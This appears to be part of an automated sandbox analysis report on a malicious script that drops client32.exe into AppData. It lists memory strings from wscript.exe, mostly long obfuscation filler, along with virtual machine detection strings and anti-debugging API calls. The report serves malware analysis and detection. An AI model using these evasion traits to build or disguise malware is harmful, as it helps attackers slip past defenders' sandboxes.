                                Source: wscript.exe, 00000000.00000003.1367815908.000002BB0934F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1377935458.000002BB093CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MbjCZxwajYaCdSKwIZtHVZlFmosBsSFuTymYbkaCtofAKxqyHcQBmotXQsiryVoXeYNmniEzaAqDySXqfRCSkwxdfnbjLJHWfsOWOlbuRLsZAADpDaKgrasfQCmlmAYlBJHTmaGUXjhzKWQruicOneCJgEtgamoGeLFOtRSGrdvKgYUSIYxzmOVEWFzFWXjDzuUAmqshyGnABhGGIhYtkDWwHIaDQovPfAFkvosmSkrvfqklhidFgIBKlJZkbDTZjYGXjxVDpeHYcThIjrSFfcHBrnerdjirXdnIAzaVIllKXwbyuVHlZhqUGMrkeFIxHGPezzaPnRoEYHzwqSQMsmjjpFsmafRWGtBXhFQsjJoBPpyIiOnKhQCxEvwMJZzwpZNUTNhefvHWrUSjtWLiSpxQajuGbOYngvtMMDlRliTehdiVsBczwCenIcSsmQnQeEpxSyGSbaMtUHrclvxZQlvkeLkFVktOwFwHtfACmztHWNcJRwjCnTgFgVArhtWLpezcWntyaXUTDQznlxLwqlApXmCpuMtDwYxMJoBJXSOvdMcRAwckvayZhBMbOaYBgBWToMubukzAAMrTCkZBtjYHxczpwuULGGmbMXOIZfhrauiXqwZMWBqvgXUGHzLmDOdSNbiGrtBhLWYXOXAfuelZrCZPspTsUdCWMtqKNYEtjBPlfPLwsGHWDIxpUJgtXkcnEYyYZJkaTVCseQemUmxRuxCbgnxDKynHaWEIzijkFRvTsxXivElDcaJYsNuBEOeUaczPsalaoPGLQtLKSUMNwDQPdXJiEZXhSkfDhMSNzTVhpPWURnLtlTCIAlsKUdEOsvUzBpNFCTdVMXpOHlUOiXztKtkUHnjNmvxtBTZlNQUQHNaUDPvcoYHuhzwinCKlVGlxrEHhCkZMGjTfuksDgaJpgVouZoplMZcpBZBYydzEqewtNmJcygGuRYXTqiSnzkIbtZgHNGOHQxvPnRuictJfdenEFPDTCrhXeWKFvmXCvxNbfiNjTSxSeRvPirvCGDxDiiGRSZqblekfERtAPNyCYWRlryRjcJZkGUYTmhJiQLJVQGJNgCZbXGFLljvqeRrFoUBwFtMdvKTJdmLqzmszSlphVwVFjcFDWTKoLgqVpPhMNQjICyudFqSwwdAvZmcsOkKmSaPOIKEmJaskdowmeVXSvzBymDoYnlGSgtYfcjMIEVWokYtdjrMpqoJaQQmGdHiHcgmfiBgEmREmRrvexZmrqUOtCecJHLsWSDIasLCfgUIFjeHaJzfXDHygYwnwfkkCzhoZWWgePxONmiujtGkGqIdyQZmyaDsZaGOtWuXXbzKWafNIbIRaJxBlyVdVkaCFDfnPXikdDZUfMMEbGGMAXBbiyjmtGtLqtWLLIXWjxBblNLniVuyfEYKyMHOMfUQYDwOubPOnwqohDPLoGFABrijoXnSgDkedDoPTzJqTfGNTGshlIAGeBvyenxhQjaOjxrVpSZMWchSMqGJOVSFZZGNMhkZRzkntmywEjzGMZhQFyarUQBJbpFdDPwnNeiiGHDaKkUveWRriXJWyiVuxKnXlyAGsrJIAkLMqnSjFkDpynTXPifwDnMMwtpzMahCuXWBGQCaEHyhRGovOEelmYKDzTtjagHEnmbrOCBJTVSWdmEwptCAVnjFtwxLNNQYjFvlNPFGafTzFPouIIqbBTDSudCyoThbDAktgBjKhpAZwHZJNTjqSURLFSUcrycXFjUwcEPaixGpwieCBMoIErloCSXgiAbZxxVVCLGcXExOwsrYVhIiTKBCyZBcLMUiZchsnbzBxQumYVndEmmYMEharqKZqYuyNiURhZbvhOjXJsqqjbbPlKOLyCetmmFCFyMQOQEBhvpPLuTwTleNvggdFohkhbYHcEqPXzGhSUAmUNFlHBJcTUIRHSmlLwOCirdQlCPHysyHuDUjRXTozpIHrfACJXSGHEEHbfenFjHQkOwvtwrOeoBCwrZwYUeiHQLaOyqgiBUgsvlScEXTQhUJiUyAxlimBvcKCRfaBSBNPLNYc
                                Source: wscript.exe, 00000009.00000003.1372423633.000002B2D535A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCiVM
                                Source: wscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh;
                                Source: wscript.exe, 00000000.00000003.1353432566.000002BB08E04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1700690750.000002B2D8160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uvweqCRFfNoPYTglHShFeNymhSetfxYIzVzzwpvPgiULGekApDKwwkKLUaOAHFqGkpcNLXrUZlNslLNdGdwhQdkvEdyABHRArFYsrwhBvUWisoJyPUdEvBHPOuQOmkxhbULxFCGMJQSBuLrOgfphNTjayaJCsMxvxbVZcYhBnHKWSOjRVxXOpoPfxqkRLhhlAuFyoONweFkujbmqumSaUkdfzXFJsWpVFogvqXLxHpGNMqWtSTxFpARIxcjMUaPxeezCucEUhAsgfjneNpqijHZSsdoHECQVwnEvVPkxMBFmOdrMBfXXvhhjNSfHrbPrBaDTiAtmvkcRqjHYSclyvRcjUvOWPMqUCPjtBKFshwLpthkutugVWSTkbaeaSNCqvMFPqsZcPwuueQsllJcQdCSkgPOhDTwCWkPQPryXYVASNEVanSgJTRkjLvYbZiSdLKLadTdtZKHZKgbpHGXLhxGwcsZdNMbJUUxSFcrybQCvhmRKWLkyXCScvODegMhDGaViSErTaWpBzmMUZKqhNiHOLHVhLuyTBUyScpgFFasAbqUSfzWrsdJwVaKTNwOcwWqaGJBsZeMsjKjtxWkpXFwXBIHYfVkNoLRwQDpKxpmdqHyKNlCIeikgJGBEPADCxcXINTzKjGkMqdlLmvwGoRytiiCUHRDmoMJlWUJMbsRcYVCzkfCtgytmUjQSaKOvzgQygDwkeFzIhGpTELFnzpNkeDegxQSMFTjbOXWylXygVPqFWJnPVlvOooZeawMguXYlUHDoRTEQzgiNdhMAucwUfXqzBaAJqfDIakOUExSsQNbISvueKbJMjYCmzbwrXVvjKjumlYUJDnJDFwzNPhVUAtENSuQxBhiILIcPwrlKZoEskyaRKCcrxDoDfBqRkwtMVAazbXUIUbykJuJYHOQKQoFDgmhMkvWGCrLIkPREFSZyZEOCIVhafCCDOLorSvhoPromkOitSBAgzZkEudvnteDaMJFxUVoEUTrJnrNTRzNcxEjhiDTTJNvfHFFCsIzLKjUHLpOvzbdMIVcPWWRpqLmJexziLyYnvYDBDnaqORKzLhYtGcqmxYGvxokxcmekDyRIiSBPpsmleMuKyOEaCfyEcrlpEHujDXZbinQnMYFyaKdOHPWWyVZfwlDkctQGdafmnoZfwduuSpvLkRrFzbCYpjFMRhPRNRKfEoQXVbkDijvgBRUjKlImjeobtcxmfuyMIUOfEVcXcRkrLwnwoGsLUxAkZJLFciqxSYrajCHTYNHlJaxnBNnWoHyvSgccRmSQzpuuPNYzdwtwqaredWRqmhNXFdYwFNlZZUpoZDcSHaIAOaUzSJEoKNGOVtiubgnztDzqHJaMRABTXvbZDCZekyvcMqbEjmdOKDBLkFevXcwXxdyHahfNYRjUyddsLOXFFTUUxccMDAGYQTtJjYcqCKQCmgKixOglVgZEWTPxdExzkwbASiHrylthVLZGicOnNkksapRuPmyYlAtnwjPVvZYYbltxOfBztLblbIzoNAqmIBDyrrxIkwgRGerXOBmyLWWnIsCPBQywjBwVztkBvFPSNhESZISmztGqHHznTECseQJGhLFZhKnNFXSCZBvHsyRoRfPtMIdVJLmXeJtDWGiPkIaEqHBtUimDzabDKyRffLZDIUAyikiBbGJLOsoIpbsgjCeKEnMjKXkGgMIXYLFXrEJAHayiIvMCIZNdQQtdizhplTHbVgQTzdKzgubmvXxTEQabWNYWFtwAeNNKxsWaKCfDcTAXQEGwaamkMXElopaDykIWwImKHKXHtADWZzzSXicGQahOvohlbNnmXgqGGmwgXQYoBoPqtLlavwwjbpTTKErnmhweQLdBrnwTvaEGXGLnEheUAyNZaRqiFQdojOlfgHFlJFrCcKPHJaQDfGXLIMOoVnJSyYjXFjDKWTgpbRrRUNmsuMQaflTczrioiUNATFyFVIFlyVNJIxhrJrgTeOafrfVEouqEkzKSVRvkWNMWLjlgDPOBuVkaxvWxEiHNTqCsrEPlXvqMfufMDxAyIgzr
                                Source: client32.exeBinary or memory string: VMWare
                                Source: wscript.exe, 00000000.00000003.1377935458.000002BB09451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qEOyBKouqPQuJLOYuMFuMUpCduhkdXyEbHQHXtchvxuQYpTuMDdicFvjXPXjcpPwOvNrCVRsGJYKwENVnVlCXolVdvNUUqaSnaVlLHEXuOMvnNfFQYrUyfLSMBGcRUNHAmYTqkMjogJKZFsDCUFCdNKsnbsoKfklTvesjOFFNrZCCoySoPrhhyKvZreCsJPAHEorWdbYZBwxiVYazEKjAGmjWnfmXfcAdJyebYqzokXLCNKSstVaCEsLFlCgdDsgsElHIkdsGIyrRoyLkAArkOGwMvCCHEKzBJAFTmSCpVgdwAbwGHnVZBLTbeLQvGnXzpZSJzhErtcBYTUPAtSGpkQdVYkEEeLussdZRcNVzZpNfMcFBFZyVuTKZZNMbXUQRUJmuPzUOGGUDMkJcraGxyXWvgTiZvoRgKqMMlyEMbjCZxwajYaCdSKwIZtHVZlFmosBsSFuTymYbkaCtofAKxqyHcQBmotXQsiryVoXeYNmniEzaAqDySXqfRCSkwxdfnbjLJHWfsOWOlbuRLsZAADpDaKgrasfQCmlmAYlBJHTmaGUXjhzKWQruicOneCJgEtgamoGeLFOtRSGrdvKgYUSIYxzmOVEWFzFWXjDzuUAmqshyGnABhGGIhYtkDWwHIaDQovPfAFkvosmSkrvfqklhidFgIBKlJZkbDTZjYGXjxVDpeHYcThIjrSFfcHBrnerdjirXdnIAzaVIllKXwbyuVHlZhqUGMrkeFIxHGPezzaPnRoEYHzwqSQMsmjjpFsmafRWGtBXhFQsjJoBPpyIiOnKhQCxEvwMJZzwpZNUTNhefvHWrUSjtWLiSpxQajuGbOYngvtMMDlRliTehdiVsBczwCenIcSsmQnQeEpxSyGSbaMtUHrclvxZQlvkeLkFVktOwFwHtfACmztHWNcJRwjCnTgFgVArhtWLpezcWntyaXUTDQznlxLwqlApXmCpuMtDwYxMJoBJXSOvdMcRAwckvayZhBMbOaYBgBWToMubukzAAMrTCkZBtjYHxczpwuULGGmbMXOIZfhrauiXqwZMWBqvgXUGHzLmDOdSNbiGrtBhLWYXOXAfuelZrCZPspTsUdCWMtqKNYEtjBPlfPLwsGHWDIxpUJgtXkcnEYyYZJkaTVCseQemUmxRuxCbgnxDKynHaWEIzijkFRvTsxXivElDcaJYsNuBEOeUaczPsalaoPGLQtLKSUMNwDQPdXJiEZXhSkfDhMSNzTVhpPWURnLtlTCIAlsKUdEOsvUzBpNFCTdVMXpOHlUOiXztKtkUHnjNmvxtBTZlNQUQHNaUDPvcoYHuhzwinCKlVGlxrEHhCkZMGjTfuksDgaJpgVouZoplMZcpBZBYydzEqewtNmJcygGuRYXTqiSnzkIbtZgHNGOHQxvPnRuictJfdenEFPDTCrhXeWKFvmXCvxNbfiNjTSxSeRvPirvCGDxDiiGRSZqblekfERtAPNyCYWRlryRjcJZkGUYTmhJiQLJVQGJNgCZbXGFLljvqeRrFoUBwFtMdvKTJdmLqzmszSlphVwVFjcFDWTKoLgqVpPhMNQjICyudFqSwwdAvZmcsOkKmSaPOIKEmJaskdowmeVXSvzBymDoYnlGSgtYfcjMIEVWokYtdjrMpqoJaQQmGdHiHcgmfiBgEmREmRrvexZmrqUOtCecJHLsWSDIasLCfgUIFjeHaJzfXDHygYwnwfkkCzhoZWWgePxONmiujtGkGqIdyQZmyaDsZaGOtWuXXbzKWafNIbIRaJxBlyVdVkaCFDfnPXikdDZUfMMEbGGMAXBbiyjmtGtLqtWLLIXWjxBblNLniVuyfEYKyMHOMfUQYDwOubPOnwqohDPLoGFABrijoXnSgDkedDoPTzJqTfGNTGshlIAGeBvyenxhQjaOjxrVpSZMWchSMqGJOVSFZZGNMhkZRzkntmywEjzGMZhQFyarUQBJbpFdDPwnNeiiGHDaKkUveWRriXJWyiVuxKnXlyAGsrJIAkLMqnSjFkDpynTXPifwDnMMwtpzMahCuXWBGQCaE
                                Source: wscript.exe, 00000000.00000003.1377935458.000002BB093CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cwXxdyHahfNYRjUyddsLOXFFTUUxccMDAGYQTtJjYcqCKQCmgKixOglVgZEWTPxdExzkwbASiHrylthVLZGicOnNkksapRuPmyYlAtnwjPVvZYYbltxOfBztLblbIzoNAqmIBDyrrxIkwgRGerXOBmyLWWnIsCPBQywjBwVztkBvFPSNhESZISmztGqHHznTECseQJGhLFZhKnNFXSCZBvHsyRoRfPtMIdVJLmXeJtDWGiPkIaEqHBtUimDzabDKyRffLZDIUAyikiBbGJLOsoIpbsgjCeKEnMjKXkGgMIXYLFXrEJAHayiIvMCIZNdQQtdizhplTHbVgQTzdKzgubmvXxTEQabWNYWFtwAeNNKxsWaKCfDcTAXQEGwaamkMXElopaDykIWwImKHKXHtADWZzzSXicGQahOvohlbNnmXgqGGmwgXQYoBoPqtLlavwwjbpTTKErnmhweQLdBrnwTvaEGXGLnEheUAyNZaRqiFQdojOlfgHFlJFrCcKPHJaQDfGXLIMOoVnJSyYjXFjDKWTgpbRrRUNmsuMQaflTczrioiUNATFyFVIFlyVNJIxhrJrgTeOafrfVEouqEkzKSVRvkWNMWLjlgDPOBuVkaxvWxEiHNTqCsrEPlXvqMfufMDxAyIgzrMRwRTkuatmDhYJVdylbZfwuOkMXlsDhvzNlyRPLnUYidDZjMoXgAGhKjimCfQGYFJTGODbnxEgYhWfZoomMFkTlFKdsxyblUSVevRPaoZJJUXRqeMlSqHapmvzAgOTkQdnIDmINkBXSzdXySPhcPOkMAiSvEPRuoStshKorKNwfCDRyDdKpLfwOjQwTOZcpFwcrXvMHFlISAHOLvwcvCRCKEefZUulmxoLlDevDxzzuWKqZxdibciLYyElyJLkbXNLGYftxHJENESGinacXtxZJXjhLrcsWXToteJpyFFfKvGFynfIBmeFTmchNERvkefhfjtxMGQhwumLXkRHMJZcGBvZbksFCgbyojeBPGEAlBlNGpeUVVklyuMXvfcDtHaGBeTuSEJRGGZwjDGfXxMqjTXGhxxDxpQssBLnjGxTdnfxAlnSAejKGvmTfUOpbsGPqqgcnYpVFYMHmWeosxSHJfnVbWwushixqHLKACVKZFGmIiFmaoyzHEUBeHGvanZuPnrZDjSmovtTOpfZspkrOoUFYNAfFUzsyKgYMKIEXqGoCtLBsvydtJVBwXFlXjvNtRIOcLiRHZKPgIBIlFhZBRKhHmHqJUrxvYKnPIVePkVhQLbsBEilaKiRZQIAQcHGJmJtByWdOfljHMNOQtTBdxWdUUpnwGPtfPElKTKlCCfwQhuZAMfICvZrqKLILvhmlWxAcyhUeBNSMyCypvUWJvcjnpLtsEkJXBIjlgddeTnmRlSNEjhTPyrmmmEfdTEmUZcwNywxTtaXgzUrQHnehCZRthDrJRYjMGjqsBqsONirUSrudQScIsWdjOuobCNgTUzFuGGAwbxhDzDJVbDMPccwJcaidbCVrzCgfppSfLBKvcpKdDGscDoosMetUnqLnVIbejjwpspqNzLYMstLjAdvNReYhAmnSFbhFRBbQgePxQLHCHvkndwBcnwozGqErDmhpqNSHJfJVMQzdUbilwBlDEEpDCSsXnwFKOIQiKZJYScsBqBUiBwnwGEBCEHpVdbmciKwjEslziNWjFMAhpNhnbixQSLkSlslpFbuKOEXAthoujywCtfZHarQTxUsCkapqaJsNznRPLPLcLoVizQiDIsDSYmhybLCUWbBMsUFcxxJSYhjdtHxUBGZphYxxNsRMzkPMCvgglCPiGBtPCVVLicTpNKNkXuxAHDwrQFOemHZhuTWYPCzGhQRLLmVUuxCFJOIrHrYmkemQgEaBBxIWVujKUYOxpAIOOHdXBBGGBgdSGkDMkCPvGNDRPbjCFNCJzbCgIuHLVoPSCzUtNICrYDiHTbDrKNRWJjhcGOHNByLAnHDxddQlGlLyBnzSNsBcMIByiORRuqAkOElfiKRGnogGhkRKxENPCfoxkFrLgo
                                Source: wscript.exe, 00000000.00000003.1377935458.000002BB09451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OitSBAgzZkEudvnteDaMJFxUVoEUTrJnrNTRzNcxEjhiDTTJNvfHFFCsIzLKjUHLpOvzbdMIVcPWWRpqLmJexziLyYnvYDBDnaqORKzLhYtGcqmxYGvxokxcmekDyRIiSBPpsmleMuKyOEaCfyEcrlpEHujDXZbinQnMYFyaKdOHPWWyVZfwlDkctQGdafmnoZfwduuSpvLkRrFzbCYpjFMRhPRNRKfEoQXVbkDijvgBRUjKlImjeobtcxmfuyMIUOfEVcXcRkrLwnwoGsLUxAkZJLFciqxSYrajCHTYNHlJaxnBNnWoHyvSgccRmSQzpuuPNYzdwtwqaredWRqmhNXFdYwFNlZZUpoZDcSHaIAOaUzSJEoKNGOVtiubgnztDzqHJaMRABTXvbZDCZekyvcMqbEjmdOKDBLkFevXcwXxdyHahfNYRjUyddsLOXFFTUUxccMDAGYQTtJjYcqCKQCmgKixOglVgZEWTPxdExzkwbASiHrylthVLZGicOnNkksapRuPmyYlAtnwjPVvZYYbltxOfBztLblbIzoNAqmIBDyrrxIkwgRGerXOBmyLWWnIsCPBQywjBwVztkBvFPSNhESZISmztGqHHznTECseQJGhLFZhKnNFXSCZBvHsyRoRfPtMIdVJLmXeJtDWGiPkIaEqHBtUimDzabDKyRffLZDIUAyikiBbGJLOsoIpbsgjCeKEnMjKXkGgMIXYLFXrEJAHayiIvMCIZNdQQtdizhplTHbVgQTzdKzgubmvXxTEQabWNYWFtwAeNNKxsWaKCfDcTAXQEGwaamkMXElopaDykIWwImKHKXHtADWZzzSXicGQahOvohlbNnmXgqGGmwgXQYoBoPqtLlavwwjbpTTKErnmhweQLdBrnwTvaEGXGLnEheUAyNZaRqiFQdojOlfgHFlJFrCcKPHJaQDfGXLIMOoVnJSyYjXFjDKWTgpbRrRUNmsuMQaflTczrioiUNATFyFVIFlyVNJIxhrJrgTeOafrfVEouqEkzKSVRvkWNMWLjlgDPOBuVkaxvWxEiHNTqCsrEPlXvqMfufMDxAyIgzrMRwRTkuatmDhYJVdylbZfwuOkMXlsDhvzNlyRPLnUYidDZjMoXgAGhKjimCfQGYFJTGODbnxEgYhWfZoomMFkTlFKdsxyblUSVevRPaoZJJUXRqeMlSqHapmvzAgOTkQdnIDmINkBXSzdXySPhcPOkMAiSvEPRuoStshKorKNwfCDRyDdKpLfwOjQwTOZcpFwcrXvMHFlISAHOLvwcvCRCKEefZUulmxoLlDevDxzzuWKqZxdibciLYyElyJLkbXNLGYftxHJENESGinacXtxZJXjhLrcsWXToteJpyFFfKvGFynfIBmeFTmchNERvkefhfjtxMGQhwumLXkRHMJZcGBvZbksFCgbyojeBPGEAlBlNGpeUVVklyuMXvfcDtHaGBeTuSEJRGGZwjDGfXxMqjTXGhxxDxpQssBLnjGxTdnfxAlnSAejKGvmTfUOpbsGPqqgcnYpVFYMHmWeosxSHJfnVbWwushixqHLKACVKZFGmIiFmaoyzHEUBeHGvanZuPnrZDjSmovtTOpfZspkrOoUFYNAfFUzsyKgYMKIEXqGoCtLBsvydtJVBwXFlXjvNtRIOcLiRHZKPgIBIlFhZBRKhHmHqJUrxvYKnPIVePkVhQLbsBEilaKiRZQIAQcHGJmJtByWdOfljHMNOQtTBdxWdUUpnwGPtfPElKTKlCCfwQhuZAMfICvZrqKLILvhmlWxAcyhUeBNSMyCypvUWJvcjnpLtsEkJXBIjlgddeTnmRlSNEjhTPyrmmmEfdTEmUZcwNywxTtaXgzUrQHnehCZRthDrJRYjMGjqsBqsONirUSrudQScIsWdjOuobCNgTUzFuGGAwbxhDzDJVbDMPccwJcaidbCVrzCgfppSfLBKvcpKdDGscDoosMetUnqLnVIbejjwpspqNzLYMstLjAdvNReYhAmnSFbhFRBbQgePxQLHCHvkndwBcnwozGqErDmhpqN
                                Source: wscript.exe, 00000000.00000003.1377935458.000002BB09451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kIaEqHBtUimDzabDKyRffLZDIUAyikiBbGJLOsoIpbsgjCeKEnMjKXkGgMIXYLFXrEJAHayiIvMCIZNdQQtdizhplTHbVgQTzdKzgubmvXxTEQabWNYWFtwAeNNKxsWaKCfDcTAXQEGwaamkMXElopaDykIWwImKHKXHtADWZzzSXicGQahOvohlbNnmXgqGGmwgXQYoBoPqtLlavwwjbpTTKErnmhweQLdBrnwTvaEGXGLnEheUAyNZaRqiFQdojOlfgHFlJFrCcKPHJaQDfGXLIMOoVnJSyYjXFjDKWTgpbRrRUNmsuMQaflTczrioiUNATFyFVIFlyVNJIxhrJrgTeOafrfVEouqEkzKSVRvkWNMWLjlgDPOBuVkaxvWxEiHNTqCsrEPlXvqMfufMDxAyIgzrMRwRTkuatmDhYJVdylbZfwuOkMXlsDhvzNlyRPLnUYidDZjMoXgAGhKjimCfQGYFJTGODbnxEgYhWfZoomMFkTlFKdsxyblUSVevRPaoZJJUXRqeMlSqHapmvzAgOTkQdnIDmINkBXSzdXySPhcPOkMAiSvEPRuoStshKorKNwfCDRyDdKpLfwOjQwTOZcpFwcrXvMHFlISAHOLvwcvCRCKEefZUulmxoLlDevDxzzuWKqZxdibciLYyElyJLkbXNLGYftxHJENESGinacXtxZJXjhLrcsWXToteJpyFFfKvGFynfIBmeFTmchNERvkefhfjtxMGQhwumLXkRHMJZcGBvZbksFCgbyojeBPGEAlBlNGpeUVVklyuMXvfcDtHaGBeTuSEJRGGZwjDGfXxMqjTXGhxxDxpQssBLnjGxTdnfxAlnSAejKGvmTfUOpbsGPqqgcnYpVFYMHmWeosxSHJfnVbWwushixqHLKACVKZFGmIiFmaoyzHEUBeHGvanZuPnrZDjSmovtTOpfZspkrOoUFYNAfFUzsyKgYMKIEXqGoCtLBsvydtJVBwXFlXjvNtRIOcLiRHZKPgIBIlFhZBRKhHmHqJUrxvYKnPIVePkVhQLbsBEilaKiRZQIAQcHGJmJtByWdOfljHMNOQtTBdxWdUUpnwGPtfPElKTKlCCfwQhuZAMfICvZrqKLILvhmlWxAcyhUeBNSMyCypvUWJvcjnpLtsEkJXBIjlgddeTnmRlSNEjhTPyrmmmEfdTEmUZcwNywxTtaXgzUrQHnehCZRthDrJRYjMGjqsBqsONirUSrudQScIsWdjOuobCNgTUzFuGGAwbxhDzDJVbDMPccwJcaidbCVrzCgfppSfLBKvcpKdDGscDoosMetUnqLnVIbejjwpspqNzLYMstLjAdvNReYhAmnSFbhFRBbQgePxQLHCHvkndwBcnwozGqErDmhpqNSHJfJVMQzdUbilwBlDEEpDCSsXnwFKOIQiKZJYScsBqBUiBwnwGEBCEHpVdbmciKwjEslziNWjFMAhpNhnbixQSLkSlslpFbuKOEXAthoujywCtfZHarQTxUsCkapqaJsNznRPLPLcLoVizQiDIsDSYmhybLCUWbBMsUFcxxJSYhjdtHxUBGZphYxxNsRMzkPMCvgglCPiGBtPCVVLicTpNKNkXuxAHDwrQFOemHZhuTWYPCzGhQRLLmVUuxCFJOIrHrYmkemQgEaBBxIWVujKUYOxpAIOOHdXBBGGBgdSGkDMkCPvGNDRPbjCFNCJzbCgIuHLVoPSCzUtNICrYDiHTbDrKNRWJjhcGOHNByLAnHDxddQlGlLyBnzSNsBcMIByiORRuqAkOElfiKRGnogGhkRKxENPCfoxkFrLgoODGPPYBnPJljSxPWMHltsitnUBtNXWznPSOofcmmpnUcuFxUsmHBPNaDpFrTRbpJaVgomDAcpjkNIZXBRyNszcZUokqLqiREgFMXXQLyWMkYPuOkdRPiDJXHsLlgJdQXqqacTuGpDVNAZtDpWtBhUCwfcqJlSAcBsKBAnfLePyWcJRFdJyBlltwLgLCMrRWXLmZcgkEjqqZfcuKWnduOXNHTppkbRrhnlaRowXkXROksxTE
                                Source: wscript.exe, 00000000.00000003.1367815908.000002BB0934F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hLWYXOXAfuelZrCZPspTsUdCWMtqKNYEtjBPlfPLwsGHWDIxpUJgtXkcnEYyYZJkaTVCseQemUmxRuxCbgnxDKynHaWEIzijkFRvTsxXivElDcaJYsNuBEOeUaczPsalaoPGLQtLKSUMNwDQPdXJiEZXhSkfDhMSNzTVhpPWURnLtlTCIAlsKUdEOsvUzBpNFCTdVMXpOHlUOiXztKtkUHnjNmvxtBTZlNQUQHNaUDPvcoYHuhzwinCKlVGlxrEHhCkZMGjTfuksDgaJpgVouZoplMZcpBZBYydzEqewtNmJcygGuRYXTqiSnzkIbtZgHNGOHQxvPnRuictJfdenEFPDTCrhXeWKFvmXCvxNbfiNjTSxSeRvPirvCGDxDiiGRSZqblekfERtAPNyCYWRlryRjcJZkGUYTmhJiQLJVQGJNgCZbXGFLljvqeRrFoUBwFtMdvKTJdmLqzmszSlphVwVFjcFDWTKoLgqVpPhMNQjICyudFqSwwdAvZmcsOkKmSaPOIKEmJaskdowmeVXSvzBymDoYnlGSgtYfcjMIEVWokYtdjrMpqoJaQQmGdHiHcgmfiBgEmREmRrvexZmrqUOtCecJHLsWSDIasLCfgUIFjeHaJzfXDHygYwnwfkkCzhoZWWgePxONmiujtGkGqIdyQZmyaDsZaGOtWuXXbzKWafNIbIRaJxBlyVdVkaCFDfnPXikdDZUfMMEbGGMAXBbiyjmtGtLqtWLLIXWjxBblNLniVuyfEYKyMHOMfUQYDwOubPOnwqohDPLoGFABrijoXnSgDkedDoPTzJqTfGNTGshlIAGeBvyenxhQjaOjxrVpSZMWchSMqGJOVSFZZGNMhkZRzkntmywEjzGMZhQFyarUQBJbpFdDPwnNeiiGHDaKkUveWRriXJWyiVuxKnXlyAGsrJIAkLMqnSjFkDpynTXPifwDnMMwtpzMahCuXWBGQCaEHyhRGovOEelmYKDzTtjagHEnmbrOCBJTVSWdmEwptCAVnjFtwxLNNQYjFvlNPFGafTzFPouIIqbBTDSudCyoThbDAktgBjKhpAZwHZJNTjqSURLFSUcrycXFjUwcEPaixGpwieCBMoIErloCSXgiAbZxxVVCLGcXExOwsrYVhIiTKBCyZBcLMUiZchsnbzBxQumYVndEmmYMEharqKZqYuyNiURhZbvhOjXJsqqjbbPlKOLyCetmmFCFyMQOQEBhvpPLuTwTleNvggdFohkhbYHcEqPXzGhSUAmUNFlHBJcTUIRHSmlLwOCirdQlCPHysyHuDUjRXTozpIHrfACJXSGHEEHbfenFjHQkOwvtwrOeoBCwrZwYUeiHQLaOyqgiBUgsvlScEXTQhUJiUyAxlimBvcKCRfaBSBNPLNYcYVTRFPzBJXRxqZQbzakWMpbNePSEqKfqMFOXImwUzEnSpHhGUldLYWlFQAJTxRbjfGSJDANtVKDsZEitgqkpWNdVWhyXlfQQhgmPptdXQDYzFoneslpbTnNDHnsYdcNKdyJjQeLmechXGmEAisyMnIFrqQhqqiYXmBAvkZzyoYzLWbKrmirdaRQDZfdbGCNZoWLcUdcwlDMmRjlBHwvzBhLAKRpxWSmffJdubLFSrGbogwyyPyrUGeLbLtypFIvUpPDOemHgVQesivtSVwakGRbjGYHfQNFPYnEDxyaWxYnHsXMubiqCMessfVWraMnMnxhFOUeRtpSWWeQzlKHUshEwqRALhyOXCclSdHTVLrSriZaYsGcOVmfaFDUTKEdZOfzszmnIlrsuoLznvivagQSocZVJQSipirxNarZuAVGBpKRljZFxYEeWZkvOEKvpJNzRhpzLljZrUqagemgtdMkZysHAcCnseHYOQerjkGKHRHmXivBxRbVjefXnRvXAdrsRszcPSNVSTMjsMjkmdYGsFsRuiKKCCQGOKwjtIbJKukqMDydlArbjGyYZZspSYeyFDtdKICBaMhPugyXPggCGgINrIuLesXCUqYCiSvXyHdfAtUVoAGwnNOQNvkzkGoVLuKJLBlv
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeAPI call chain: ExitProcess graph end nodegraph_13-63256
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeAPI call chain: ExitProcess graph end nodegraph_13-62881
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,13_2_110B7F30
